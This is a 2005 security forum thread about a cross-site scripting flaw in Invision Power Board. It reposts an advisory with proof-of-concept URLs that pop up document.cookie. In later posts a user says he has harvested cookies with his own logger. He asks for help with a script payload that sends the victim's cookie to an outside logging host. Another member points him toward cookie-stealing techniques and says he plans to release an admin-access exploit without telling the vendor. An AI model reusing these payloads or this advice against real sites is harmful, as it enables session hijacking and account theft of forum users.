[Kenny]

btw my name is not arron ward.... its an alias account

Quote

Invision Power Board URL Parameter Input Validation Error Lets Remote Users Conduct Cross-Site Scripting Attacks

SecurityTracker alert ID:� 1013863�
SecurityTracker URL:� http://securitytracker.com/id?1013863�
CVE Reference:� GENERIC-MAP-NOMATCH�  (Links to External Site)�
Date:� May 2 2005

Impact:� Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Exploit Included:� Yes� 

Version(s): 2.0.3, 2.1 Alpha 2

Description:� Arron Ward from GovernmentSecurity.org reported an input validation vulnerability in Invision Power Board. A remote user can conduct cross-site scripting attacks.

The forum software does not properly validate user-supplied input in certain URL parameters. A remote user can create a specially crafted URL that, when loaded by an authenticated target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Invision Power Board software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?act='><script>alert(document.cookie)</script>

Internet Explorer users are affected. Some other browsers do not execute the resulting HTML.

Other parameters are also affected.

Impact:� A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Invision Power Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:� No solution was available at the time of this entry.

Vendor URL:� www.invisionboard.com/ (Links to External Site)

Cause:� Input validation error

Underlying OS:� Linux (Any), UNIX (Any), Windows (Any)

Reported By:� "arron ward" <deadlink@elitemail.org>

Message History:�  None.


� Source Message Contents


==================================

Invision Xss reveals Cookie and session details

by adding = to a script input , on any page can reveal logged in user
cookie and session details including hashes... details below

note:you must be a member for this to work !!

Vendor:http://www.invisionboard.com/

Notified = Yes

29/4/2005

Tested on

IPB 2.0.3
IPB 2.1 Alpha 2

not tested on other versions but i expect they will be vuln also


Tested this on IPB main website forum and it is fully working

also notifed IPB Admin via Private Message

Details:

here is the scripts this will work on various pages for instance : using
IE

Example visit:

http://forums.invisi...m/index.php?act

Now by adding an a equal = and script messsage , in this case to reveal
cookies and session path details including user hash ...

='><script>alert(document.cookie)</script>

so XSS full url is :

http://forums.invisi...hp?...</script>

again this will work on multipule urls...examples follow

/forum/index.php?act=Members='><script>alert(document.cookie)</script>
/forum/index.php?act='><script>alert(document.cookie)</script>
/forum/index.php?act=calendar='><script>alert(document.cookie)</script>
/forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</script>

and so on...

regards

ComSec

co/Admin

http://www.governmen...urity.org/forum
--

FIX: upgrade to 2.0.4

Attached File(s)

•  11.jpg (108.51K)
  Number of downloads: 189

[Kenny]

it appears IPB have deleted or moved the thread to a private part of there forum after i posted it there and was confirmed by existing forum owners...

they did not have the decency to inform me via PM that they removed it.... if you ask me thats damn right ignorance ....

thanks V for the PM at IPB :)

[KarachiKing555]

@comsec
Can u pls like to help and give lil idea over here regarding cookie vul Remote User

[Kenny]

well you could create a link that ...if a member clicks the link... it then sends his details to your site and a specific file.

am not being funny when i say Google

search for.... cookie stealing and php cookie stealing ... there are various methods depends on what your setup is... so i could be here all day trying to sort one method....there are plenty of papers and hints... so try them ;)

[Blake]

I am a bit annoyed with IPB at the moment. The reason why IPB was first chosen for this forum was because of the responsivness and the speed at which patches were released. I hope they begin to start increasing there customer service. Perhaps the vulnerabilities that are found should be released onto the major lists as a motivation factor.

[Kenny]

hence Gsecur... that is why i have not informed them about the other XSS i found in Invision Gallery.... they are as far as am comcerned Ignorant... to not even say hey.." thanks for letting us know we have a problem " they just release a patch to upgrade to 2.0.4

bollocks to them in future.... anymore i find from now on will get released without notice.... including one am working on for Admin Access and am not far away from getting it to work

[Warlord_David]

ha i remeber something else like this, nothing to do with IPB though. It was an .exe that installed a backdoor, after installed it sent i.p. address with user/pass information and the port to a webserver you had to make (the program came with all the files)

[KarachiKing555]

Thx Comsec !! it was right there on google ! i was searching for sql injection and all thet stuff !! i successfully got the cookies @ my new loger !! but have lil problem here !

XSS vuln is which successfully gave me cookies alert !

[color=img srchttpaaaaaaaajpg border0 altuser posted image ]`style=background:url("javascript:alert(unescape(document.cookie));") [/color]

and i wana inject this

<script>window.document.location='http://somesite.hostedat.com/root/log.php?cookie='+window.document.cookie;</script>

i tried this but no luck :(

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:window.document.location('http://somesite.hostedat.com/root/log.php?cookie='+window.document.cookie');") [/COLOR]

any idea how could this work :unsure: Thanx again for all your help !

KarachiKing555

This post has been edited by KarachiKing555: 05 May 2005 - 08:37 AM

[Axl]

h3h3h3h3 =]
comsec...do you hear bells ringing ??

KarachiKing555:
this exploit works
but not on gso
not anymore that is.... :lol:

[KarachiKing555]

@AXL
This XSS Will not even work on IPB 1.3 i think ! im testing this on 1.2 ;) !! just trying to learn this stuff b4 messing with current versions and all :rolleyes:

[Axl]

yes it does work
i tested it successfully on gso about a week ago!
but because gso was not patched then and due to comsec's request i kept my mouth shut :blink:

anyway...
it works!

[KarachiKing555]

hmmmmm

[Kenny]

yes it did work... our problem was ... we had just moved servers and transfered everything but never got around to applying the patches... till Axl noticed while he was in one of his snooping moods... fair play to him ..he informed us on the spot... like all good guys do and we patched them... well Gsecur did... after i hassled him as usual ;)